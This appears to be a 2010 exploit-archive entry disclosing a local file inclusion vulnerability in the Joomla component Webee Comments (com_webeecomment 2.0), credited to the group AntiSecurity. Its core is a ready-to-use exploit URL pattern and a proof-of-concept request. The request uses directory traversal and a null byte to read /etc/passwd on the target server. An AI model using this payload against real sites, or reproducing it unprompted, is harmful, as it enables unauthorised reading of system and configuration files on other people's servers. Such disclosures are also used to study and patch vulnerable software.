id: 11678
date: 04/08/2010
title: Joomla Component Webee Comments Local File Inclusion Vulnerability
author: AntiSecurity
cves: 

==================================================================
Joomla Component Webee Comments Local File Inclusion Vulnerability 
==================================================================

==================================================================================================================
 
 
  [o] Joomla Component Webee Comments Local File Inclusion Vulnerability
  
       Software : com_webeecomment version 2.0
       Vendor   : http://www.onnogroen.nl/webee/
       Author   : AntiSecurity [ s4va NoGe Vrs-hCk OoN_BoY Paman zxvf ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/
 
 
==================================================================================================================
 
 
  [o] Exploit
 
       http://localhost/[path]/index.php?option=com_webeecomment&controller=[LFI]
 
 
  [o] PoC
 
       http://localhost/index.php?option=com_webeecomment&controller=../../../../../../../../../../etc/passwd%00
 
 
==================================================================================================================



#  0day.today [2023-03-23]  #